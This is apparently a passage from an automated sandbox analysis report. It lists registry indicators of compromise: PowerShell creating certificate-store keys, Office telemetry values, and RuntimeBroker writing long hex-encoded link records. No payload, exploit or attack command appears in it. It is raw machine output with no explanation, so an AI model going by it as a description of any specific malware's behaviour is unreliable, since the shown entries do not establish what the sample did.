\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 20 May 2025 00:43:59 GMT" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1747701838" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\32f11c7c-3c99-47aa RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\32f11c7c-3c99-47aa = 414b621c20c9db01 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a0758fc9-3119-48de RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\209b8066-ed4f-494f = "8324" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c688f9-88ee-4678 = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000070a3b31c20c9db01e501131d20c9db01e501131d20c9db0137ed09000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b45a59052000376630353262366234663631323432363161653639613266383739303561393062323331656239323961383063306631373064396432346234343361663134380000b20009000400efbeb45a5905b45a59052e000000000000000000000000000000000000000000000000002557a300370066003000350032006200360062003400660036003100320034003200360031006100650036003900610032006600380037003900300035006100390030006200320033003100650062003900320039006100380030006300300066003100370030006400390064003200340062003400340033006100660031003400380000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001ba978ef1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37663035326236623466363132343236316165363961326638373930356139306232333165623932396138306330663137306439643234623434336166313438000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006c7a676f6e62746a0000000000000000d07758bc69233b4ea7ba0bbf192db8783ba5c5e16c27f011a617f2717f61ef81d07758bc69233b4ea7ba0bbf192db8783ba5c5e16c27f011a617f2717f61ef81d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0033003900350031003900380036003300350038002d0034003000300036003900310039003800340030002d0031003000300039003600390030003800340032002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000007c15f888000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\430d0482-62a8-4622 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc75472c-0f5a-47b9 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc75472c-0f5a-47b9 = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000004495621c20c9db014495621c20c9db014495621c20c9db01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b45a59052000643962323736373336303730383432306537346432396533643132356566396230343262313966626233616230333835323861303863383130653836386331610000b20009000400efbeb45a5905b45a59052e00000000000000000000000000000000000000000000000000bccb9900640039006200320037003600370033003600300037003000380034003200300065003700340064003200390065003300640031003200350065006600390062003000340032006200310039006600620062003300610062003000330038003500320038006100300038006300380031003000650038003600380063003100610000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001ba978ef1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c64396232373637333630373038343230653734643239653364313235656639623034326231396662623361623033383532386130386338313065383638633161000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006c7a676f6e62746a0000000000000000d07758bc69233b4ea7ba0bbf192db87837a5c5e16c27f011a617f2717f61ef81d07758bc69233b4ea7ba0bbf192db87837a5c5e16c27f011a617f2717f61ef81d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0033003900350031003900380036003300350038002d0034003000300036003900310039003800340030002d0031003000300039003600390030003800340032002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000007c15f888000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5faf247-5257-402c RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5faf247-5257-402c = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c92eb376-4e5d-410f = "\\\\?\\Volume{88F8157C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\700a445815bf4636b5df742c548f8b4a4b8339ddb3f54de002274e7eca8174ce" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\430d0482-62a8-4622 = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000006545541c20c9db016545541c20c9db016545541c20c9db01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b45a59052000373030613434353831356266343633366235646637343263353438663862346134623833333964646233663534646530303232373465376563613831373463650000b20009000400efbeb45a5905b45a59052e000000000000000000000000000000000000000000000000009b1ba800370030003000610034003400350038003100350062006600340036003300360062003500640066003700340032006300350034003800660038006200340061003400620038003300330039006400640062003300660035003400640065003000300032003200370034006500370065006300610038003100370034006300650000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001ba978ef1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37303061343435383135626634363336623564663734326335343866386234613462383333396464623366353464653030323237346537656361383137346365000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006c7a676f6e62746a0000000000000000d07758bc69233b4ea7ba0bbf192db87835a5c5e16c27f011a617f2717f61ef81d07758bc69233b4ea7ba0bbf192db87835a5c5e16c27f011a617f2717f61ef81d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0033003900350031003900380036003300350038002d0034003000300036003900310039003800340030002d0031003000300039003600390030003800340032002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000007c15f888000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\32f11c7c-3c99-47aa = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000db09591c20c9db01db09591c20c9db01db09591c20c9db01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b45a59052000376630353262366234663631323432363161653639613266383739303561393062323331656239323961383063306631373064396432346234343361663134380000b20009000400efbeb45a5905b45a59052e000000000000000000000000000000000000000000000000002557a300370066003000350032006200360062003400660036003100320034003200360031006100650036003900610032006600380037003900300035006100390030006200320033003100650062003900320039006100380030006300300066003100370030006400390064003200340062003400340033006100660031003400380000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001ba978ef1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37663035326236623466363132343236316165363961326638373930356139306232333165623932396138306330663137306439643234623434336166313438000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006c7a676f6e62746a0000000000000000d07758bc69233b4ea7ba0bbf192db87836a5c5e16c27f011a617f2717f61ef81d07758bc69233b4ea7ba0bbf192db87836a5c5e16c27f011a617f2717f61ef81d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0033003900350031003900380036003300350038002d0034003000300036003900310039003800340030002d0031003000300039003600390030003800340032002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000007c15f888000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a0758fc9-3119-48de = d4f0711c20c9db01 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\209b8066-ed4f-494f = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c688f9-88ee-4678 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5faf247-5257-402c = "\\\\?\\Volume{88F8157C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\d9b2767360708420e74d29e3d125ef9b042b19fbb3ab038528a08c810e868c1a" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5faf247-5257-402c = da38551d20c9db01 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a0758fc9-3119-48de = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a0758fc9-3119-48de = "\\\\?\\Volume{88F8157C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\54c7f247c0aee772de6bf16892db7664772fff5879be3ea682c70452bc83ef2c" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc75472c-0f5a-47b9 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\430d0482-62a8-4622 = "8324" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc75472c-0f5a-47b9 = 5279671c20c9db01 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc75472c-0f5a-47b9 = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc75472c-0f5a-47b9 = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c92eb376-4e5d-410f = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000a41b8b1c20c9db01383b4c1d20c9db01383b4c1d20c9db01ca430a000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b45a59052000373030613434353831356266343633366235646637343263353438663862346134623833333964646233663534646530303232373465376563613831373463650000b20009000400efbeb45a5905b45a59052e000000000000000000000000000000000000000000000000009b1ba800370030003000610034003400350038003100350062006600340036003300360062003500640066003700340032006300350034003800660038006200340061003400620038003300330039006400640062003300660035003400640065003000300032003200370034006500370065006300610038003100370034006300650000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001ba978ef1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d